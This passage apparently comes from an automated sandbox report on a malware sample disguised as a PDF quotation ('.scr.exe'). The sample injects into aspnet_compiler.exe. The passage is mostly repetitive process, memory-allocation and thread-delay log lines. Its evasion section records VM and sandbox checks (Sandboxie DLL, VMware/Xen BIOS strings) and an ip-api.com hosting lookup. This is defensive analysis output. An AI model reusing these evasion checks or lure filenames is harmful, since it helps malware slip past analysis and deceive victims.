                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: QUOTATION_APRQTRA031244#U00faPDF.scr.exe PID: 5356, type: MEMORYSTR
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL@\^Q
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORER9SBIEDLL.DLL:SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE;VERSION<SERIALNUMBER>VMWARE|VIRTUAL|A M I|XEN?SELECT * FROM WIN32_COMPUTERSYSTEM@MANUFACTURERAMODELBMICROSOFT|VMWARE|VIRTUALCJOHNDANNAEXXXXXXXX
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory allocated: F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory allocated: 4AE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory allocated: 60F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory allocated: 70F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory allocated: 7E10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory allocated: 8E10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 15F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599765Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599649Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599326Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599218Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599108Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598890Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598672Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598562Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598453Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598343Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598234Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598125Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598015Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597905Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597797Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597687Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597577Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597468Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597359Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597244Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597140Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596915Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596812Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596703Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596593Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596484Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596375Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596265Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596156Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596047Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595937Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595828Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595718Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595487Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595375Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595265Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595156Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595047Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 594937Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 594780Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 594663Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 594562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1800000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799657Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798357Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798016Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797906Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797797Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797325Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796981Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796657Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796282Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795809Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795579Jump to behavior
